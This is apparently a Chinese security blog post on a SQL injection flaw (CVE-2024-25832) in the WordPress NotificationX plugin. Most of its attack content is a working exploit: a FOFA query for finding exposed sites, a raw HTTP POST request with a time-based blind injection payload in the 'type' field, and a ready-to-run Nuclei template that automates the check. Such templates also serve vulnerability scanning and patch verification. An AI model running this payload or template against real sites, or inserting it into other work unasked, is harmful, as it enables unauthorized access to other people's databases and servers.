WordPress Plugin是一种用于扩展和增强WordPress网站功能的软件插件。WordPress是一种流行的内容管理系统(CMS),它提供了基本的网站功能,如文章发布、页面管理和用户权限控制等。然而,有时候用户需要更多的功能或特定的定制需求,这时就可以使用WordPress Plugin来实现。此产品存在SQL注入漏洞,恶意攻击者可能会利用此漏洞获取服务器的敏感信息,最终导致服务器失陷。
影响版本
WordPress Plugin NotificationX
body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host:
Content-Type: application/json
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
id: CVE-2024-25832
info:
name: WordPress Plugin SQL注入漏洞(CVE-2024-25832)
author: nobody
severity: high
description: |
WordPress Plugin 存在SQL注入漏洞,恶意攻击者可能会利用此漏洞获取服务器的敏感信息,最终导致服务器失陷。
impact: |
恶意攻击者可能会利用此漏洞获取服务器的敏感信息
remediation: |
升级最新版本,打补丁
metadata:
verified: true
max-request: 3
fofa-query: body="/wp-content/plugins/notificationx"
tags: CVE-2024-25832,sqli
requests:
- raw:
- |-
@timeout:10s
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
matchers:
- type: dsl
condition: and
dsl:
- "duration>=5"
- status_code==200 && contains_all(body,'\{\"success\":true\}')
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
小瑟斯
发表于 9个月前
666
评论列表
加载数据中...